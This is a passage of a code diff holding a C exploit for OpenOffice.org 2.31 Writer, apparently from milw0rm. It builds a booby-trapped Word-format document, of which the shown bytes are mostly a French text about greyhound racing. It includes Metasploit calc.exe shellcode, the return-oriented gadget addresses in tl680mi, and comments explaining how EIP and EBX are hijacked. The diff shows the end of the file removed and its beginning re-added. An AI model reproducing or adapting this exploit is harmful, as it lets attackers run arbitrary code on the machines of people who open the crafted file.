- memcpy(evilbuff+offset,file_part7,sizeof(file_part7)-1);
- offset+=sizeof(file_part7)-1;
- memcpy(evilbuff+offset,file_part8,sizeof(file_part8)-1);
- offset+=sizeof(file_part8)-1;
- memcpy(evilbuff+offset,file_part9,sizeof(file_part9)-1);
- offset+=sizeof(file_part9)-1;
-
- /*
- At the moment eip gets owned, ebx is controllable. Shellcode is at esp+0xFFFFEFA8.
- So first, ADD ESP, EBX then RET and finally PUSH ESP - RET.
- */
-
- memcpy(evilbuff+0x1c415,"\xFE\x45\x93\x60",4); //ADD ESP, EBX ... RET in tl680mi
- memcpy(evilbuff+0x1c411,"\xBD\x5C\x91\x60",4); //PUSH ESP - RET in tl680mi
- memcpy(evilbuff+0x1c40D,"\xA8\xEF\xFF\xFF",4); //value for EBX
- memcpy(evilbuff+0x1c460,calc,sizeof(calc)-1);
-
- if ((file=fopen(argv[1],"wb"))==0) {
- printf("[-] Unable to access file.\n");
- return 0;
- }
-
- fwrite( evilbuff, 1, offset, file );
- fclose(file);
- printf("[+] Done. 
Have fun!\n");
- return 0;
-}
-
-// milw0rm.com [2008-05-10]
+/*
+ Open Office.org 2.31 swriter local code execution exploit.
+ This bug has been patched in OOo 2.4.
+ Spawns calc.exe if successful.
+
+ Marsupilamipowa@hotmail.fr
+*/
+
+#include
+#include
+#include
+
+/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
+unsigned char calc[] =
+"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xcc"
+"\x35\x6a\xc8\x83\xeb\xfc\xe2\xf4\x30\xdd\x2e\xc8\xcc\x35\xe1\x8d"
+"\xf0\xbe\x16\xcd\xb4\x34\x85\x43\x83\x2d\xe1\x97\xec\x34\x81\x81"
+"\x47\x01\xe1\xc9\x22\x04\xaa\x51\x60\xb1\xaa\xbc\xcb\xf4\xa0\xc5"
+"\xcd\xf7\x81\x3c\xf7\x61\x4e\xcc\xb9\xd0\xe1\x97\xe8\x34\x81\xae"
+"\x47\x39\x21\x43\x93\x29\x6b\x23\x47\x29\xe1\xc9\x27\xbc\x36\xec"
+"\xc8\xf6\x5b\x08\xa8\xbe\x2a\xf8\x49\xf5\x12\xc4\x47\x75\x66\x43"
+"\xbc\x29\xc7\x43\xa4\x3d\x81\xc1\x47\xb5\xda\xc8\xcc\x35\xe1\xa0"
+"\xf0\x6a\x5b\x3e\xac\x63\xe3\x30\x4f\xf5\x11\x98\xa4\x4b\xb2\x2a"
+"\xbf\x5d\xf2\x36\x46\x3b\x3d\x37\x2b\x56\x0b\xa4\xaf\x1b\x0f\xb0"
+"\xa9\x35\x6a\xc8";
+
+char file_part0[]=
+"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
+"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
+"\xcc\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xce\x00\x00\x00"
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\xdc\x00\x00\x00"
+"\xcd\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\x32\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xec\xa5\xc1\x00\x35\x40\x09\x04\x00\x00\xf0\x12\xbf\x00\x00\x00" +"\x00\x00\x00\x30\x00\x00\x00\x00\x00\x06\x00\x00\x1a\x7c\x00\x00" +"\x0e\x00\x62\x6a\x62\x6a\xcf\x32\xcf\x32\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x04\x16\x00" +"\x29\x02\x01\x00\xad\x58\x00\x00\xad\x58\x00\x00\xdf\x73\x00\x00" +"\x00\x00\x00\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0f\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0f\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xff\xff\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x42\x00\x08\x03" +"\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x14\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00" +"\x00\x00\x04\x56\x00\x00\x00\x00\x00\x00\x04\x56\x00\x00\x00\x00" +"\x00\x00\x04\x56\x00\x00\x38\x00\x00\x00\x3c\x56\x00\x00\x34\x00" +"\x00\x00\x70\x56\x00\x00\xdc\x01\x00\x00\x1c\x03\x00\x00\x00\x00" +"\x00\x00\xcb\x6b\x00\x00\xf2\x00\x00\x00\x58\x58\x00\x00\x00\x00" +"\x00\x00\x58\x58\x00\x00\x16\x00\x00\x00\x6e\x58\x00\x00\x00\x00" +"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" +"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" +"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x02\x00" +"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x00\x00" +"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x00\x00" +"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x24\x00" +"\x00\x00\xbd\x6c\x00\x00\x52\x02\x00\x00\x0f\x6f\x00\x00\x6e\x00" +"\x00\x00\x70\x6b\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" +"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x00\x5e\x00\x00\x00\x00" +"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x70\x6b\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" +"\x00\x00\x85\x6b\x00\x00\x16\x00\x00\x00\x82\x61\x00\x00\x00\x00" +"\x00\x00\x82\x61\x00\x00\x00\x00\x00\x00\x82\x61\x00\x00\x00\x00" +"\x00\x00\x00\x5e\x00\x00\xea\x01\x00\x00\x08\x03\x00\x00\x00\x00" 
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x61\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x00\x00" +"\x00\x00\x82\x61\x00\x00\xf8\x00\x56\x00\x82\x61\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00" +"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00" +"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4c\x58\x00\x00\x0c\x00" +"\x00\x00\xf0\xaa\x92\x0f\x66\x1c\xc6\x01\x00\x00\x00\x00\x00\x00" +"\x00\x00\x04\x56\x00\x00\x00\x00\x00\x00\xea\x5f\x00\x00\x76\x00" +"\x00\x00\x7a\x62\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xce\x62\x00\x00\x7c\x08\x00\x00\x9b\x6b\x00\x00\x30\x00" +"\x00\x00\xcb\x6b\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00" +"\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00\x60\x60\x00\x00\x00\x01" +"\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00" +"\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x7a\x62\x00\x00\x14\x00\x00\x00\x7d\x6f\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" +"\x00\x00\x8e\x62\x00\x00\x40\x00\x00\x00\x6e\x58\x00\x00\xf0\x01" 
+"\x00\x00\x5e\x5a\x00\x00\x62\x01\x00\x00\x82\x61\x00\x00\x00\x00" +"\x00\x00\xc0\x5b\x00\x00\x1c\x01\x00\x00\xdc\x5c\x00\x00\x24\x01" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" +"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x70\x6b\x00\x00\x00\x00" +"\x00\x00\x70\x6b\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00" +"\x00\x00\x1c\x03\x00\x00\x84\x51\x00\x00\xa0\x54\x00\x00\x64\x01" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x61\x00\x00\x22\x00" +"\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00" +"\x00\x00\xa0\x54\x00\x00\x00\x00\x00\x00\x02\x00\x01\x01\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x4c\x45\x20\x4c\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f" +"\x50\x52\x49\x45\x54\x41\x49\x52\x45\x20\x44\x45\x20\x4c\x45\x56" +"\x52\x49\x45\x52\x20\x53\x50\x4f\x52\x54\x49\x46\x0d\x28\x43\x65" +"\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x20\x6e\x27\x65\x73\x74\x20" +"\x70\x61\x73\x20\x75\x6e\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74" +"\x20\x6d\x61\x69\x73\x20\x75\x6e\x20\x72\x65\x63\x75\x65\x69\x6c" +"\x20\x64\x65\x20\x63\x6f\x6e\x73\x65\x69\x6c\x73\x29\x0d\x4f\xf9" +"\x20\x76\x6f\x75\x73\x20\x61\x64\x72\x65\x73\x73\x65\x72\x20\x3f" +"\x0d\x49\x6c\x20\x66\x61\x75\x74\x20\x64\x27\x61\x62\x6f\x72\x64" +"\x20\xe9\x64\x75\x71\x75\x65\x72\x20\x76\x6f\x74\x72\x65\x20\x6a" +"\x65\x75\x6e\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\xe0\x20\x73" +"\x75\x69\x76\x72\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20" +"\x6a\x75\x73\x71\x75\x27\x61\x75\x20\x62\x6f\x75\x74\x20\x65\x74" +"\x20\xe0\x20\x74\x6f\x6c\xe9\x72\x65\x72\x20\x64\x65\x73\x20\x63" +"\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x2e\x20\x50\x6f\x75\x72" +"\x20\x63\x65\x6c\x61\x20\x76\x6f\x75\x73\x20\x64\x69\x73\x70\x6f" +"\x73\x65\x7a\x20\x64\x27\x75\x6e\x20\x72\xe9\x73\x65\x61\x75\x20" +"\x64\x65\x20\x43\x6c\x75\x62\x73\x20\x64\x65\x20\x54\x72\x61\x76" +"\x61\x69\x6c\x20\x28\x63\x6c\x75\x62\x73\x20\x64\x65\x20\x63\x6f" +"\x75\x72\x73\x65\x20\x73\x75\x72\x20\x63\x79\x6e\x6f\x64\x72\x6f" +"\x6d\x65\x20\x28\x45\x2e\x4e\x2e\x43\x20\x6f\x75\x20\x49\x2e\x54" +"\x29\x20\x6f\x75\x20\x63\x6c\x75\x62\x73\x20\x64\x65\x20\x70\x6f" +"\x75\x72\x73\x75\x69\x74\x65\x20\xe0\x20\x76\x75\x65\x20\x73\x75" +"\x72\x20\x6c\x65\x75\x72\x72\x65\x20\x28\x50\x2e\x56\x2e\x4c\x2e" +"\x29\x20\x29\x20\x61\x67\x72\xe9\xe9\x73\x20\x70\x61\x72\x20\x6c" +"\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20\x43\x65\x6e\x74\x72\x61" 
+"\x6c\x65\x20\x43\x61\x6e\x69\x6e\x65\x20\x65\x74\x20\x71\x75\x69" +"\x20\x64\x69\x73\x70\x6f\x73\x65\x6e\x74\x20\x63\x68\x61\x63\x75" +"\x6e\x20\x64\x27\x75\x6e\x20\x70\xe9\x72\x69\x6d\xe8\x74\x72\x65" +"\x20\x64\x27\x61\x74\x74\x72\x69\x62\x75\x74\x69\x6f\x6e\x20\x70" +"\x6f\x75\x72\x20\x6c\x61\x20\x64\xe9\x6c\x69\x76\x72\x61\x6e\x63" +"\x65\x20\x64\x65\x73\x20\x42\x72\x65\x76\x65\x74\x73\x20\x64\x27" +"\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x78\x20\x43\x6f\x75" +"\x72\x73\x65\x73\x20\x28\xbd\x2e\x41\x2e\x43\x2e\x19\x20\x6f\x75" +"\x20\xe0\x20\x6c\x61\x20\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x20" +"\xe0\x20\x56\x75\x65\x20\x28\x42\x2e\x50\x2e\x56\x2e\x29\x2e\x20" +"\x4c\x27\x61\x64\x72\x65\x73\x73\x65\x20\x70\x65\x75\x74\x20\x76" +"\x6f\x75\x73\x20\xea\x74\x72\x65\x20\x66\x6f\x75\x72\x6e\x69\x65" +"\x20\x70\x61\x72\x20\x6c\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20" +"\x43\x61\x6e\x69\x6e\x65\x20\x52\xe9\x67\x69\x6f\x6e\x61\x6c\x65" +"\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\x41\x73\x73\x6f\x63\x69" +"\x61\x74\x69\x6f\x6e\x20\x73\x70\xe9\x63\x69\x61\x6c\x69\x73\xe9" +"\x65\x20\x64\x65\x20\x52\x61\x63\x65\x2e\x0d\x53\x69\x20\x76\x6f" +"\x75\x73\x20\x61\x64\x68\xe9\x72\x65\x7a\x20\xe0\x20\x75\x6e\x20" +"\x63\x6c\x75\x62\x2c\x20\x76\x6f\x75\x73\x20\x72\x65\x63\x65\x76" +"\x72\x65\x7a\x20\x74\x6f\x75\x74\x65\x73\x20\x6c\x65\x73\x20\x69" +"\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x73\x20\x75\x74\x69\x6c" +"\x65\x73\x2e\x0d\x0d\x51\x75\x65\x6c\x6c\x65\x73\x20\xe9\x70\x72" +"\x65\x75\x76\x65\x73\x20\x65\x78\x69\x73\x74\x65\x6e\x74\x20\x3f" +"\x0d\x49\x6c\x20\x79\x20\x61\x20\x74\x72\x6f\x69\x73\x20\x73\x6f" +"\x72\x74\x65\x73\x20\x64\x27\xe9\x70\x72\x65\x75\x76\x65\x73\x20" +"\x3a\x0d\x0d\x31\x29\x20\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76" +"\x65\x73\x20\x4e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x73\x75" +"\x72\x20\x43\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x20\x28\x45\x2e\x4e" +"\x2e\x43\x2e\x29\x2e\x0d\x42\x61\x70\x74\x69\x73\xe9\x65\x73\x20" 
+"\x63\x6f\x75\x72\x73\x65\x73\x20\x6f\x75\x20\x72\x61\x63\x69\x6e" +"\x67\x20\x64\x61\x6e\x73\x20\x6e\x6f\x74\x72\x65\x20\x6a\x61\x72" +"\x67\x6f\x6e\x20\x65\x6c\x6c\x65\x73\x20\x73\x65\x20\x64\xe9\x72" +"\x6f\x75\x6c\x65\x6e\x74\x20\x73\x75\x72\x20\x75\x6e\x20\x63\x79" +"\x6e\x6f\x64\x72\x6f\x6d\x65\x2c\x20\xe9\x74\x61\x6c\x6f\x6e\x6e" +"\xe9\x20\x70\x75\x69\x73\x20\x61\x67\x72\xe9\xe9\x20\x70\x61\x72" +"\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4e" +"\x61\x74\x69\x6f\x6e\x61\x6c\x65\x20\x64\x27\x55\x74\x69\x6c\x69" +"\x73\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x4c\xe9\x76\x72\x69" +"\x65\x72\x73\x20\x64\x69\x74\x65\x22\x20\x43\x6f\x6d\x6d\x69\x73" +"\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x22\x2e\x0d" +"\x4c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x79\x20\x64\x69\x73" +"\x70\x75\x74\x65\x20\x64\x27\x61\x62\x6f\x72\x64\x20\x75\x6e\x65" +"\x20\x63\x6f\x75\x72\x73\x65\x20\x63\x6f\x6e\x74\x72\x65\x20\x6c" +"\x61\x20\x6d\x6f\x6e\x74\x72\x65\x20\x64\x69\x74\x65\x20\x64\x65" +"\x20\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x2c\x20" +"\x61\x70\x70\x72\xe9\x63\x69\xe9\x65\x20\x70\x61\x72\x20\x72\x61" +"\x70\x70\x6f\x72\x74\x20\xe0\x20\x75\x6e\x65\x20\x76\x69\x74\x65" +"\x73\x73\x65\x20\x64\x65\x20\x72\xe9\x66\xe9\x72\x65\x6e\x63\x65" +"\x20\x28\x31\x30\x20\xe0\x20\x31\x35\x20\x6d\xe8\x74\x72\x65\x73" +"\x20\x70\x61\x72\x20\x73\x65\x63\x6f\x6e\x64\x65\x73\x29\x20\x64" +"\x69\x74\x65\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73" +"\x65\x2e\x0d\x49\x6c\x20\x65\x73\x74\x20\x61\x6c\x6f\x72\x73\x20" +"\x63\x6c\x61\x73\x73\xe9\x20\x65\x6e\x20\x3a\x20\x49\x6e\x74\x65" +"\x72\x6e\x04\x74\x69\x6f\x6e\x61\x6c\x65\x2c\x20\x41\x2c\x20\x42" +"\x2c\x20\x43\x2c\x20\x44\x2e\x0d\x45\x6e\x73\x75\x69\x74\x65\x20" +"\x69\x6c\x20\x64\x69\x73\x70\x75\x74\x65\x20\x64\x65\x73\x20\x63" +"\x6f\x75\x72\x73\x65\x73\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63" +"\x65\x20\x6f\xf9\x20\x69\x6c\x20\x61\x66\x66\x72\x6f\x6e\x74\x65" 
+"\x20\x6c\x65\x73\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73" +"\x20\x64\x65\x20\x73\x61\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65" +"\x2e\x0d\x0d\x32\x29\x20\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76" +"\x65\x73\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c" +"\x65\x73\x2e\x20\x28\x49\x2e\x54\x29\x0d\x43\x65\x20\x73\x6f\x6e" +"\x74\x20\x64\x65\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x69" +"\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x73" +"\x75\x72\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x2e\x20\x45\x6c" +"\x6c\x65\x73\x20\x73\x65\x20\x64\x69\x73\x70\x75\x74\x65\x6e\x74" +"\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x2c\x20\x61\x70\x72" +"\xe8\x73\x20\x73\xe9\x6c\x65\x63\x74\x69\x6f\x6e\x73\x20\x73\x6f" +"\x69\x74\x20\x61\x75\x20\x74\x65\x6d\x70\x73\x2c\x20\x73\x6f\x69" 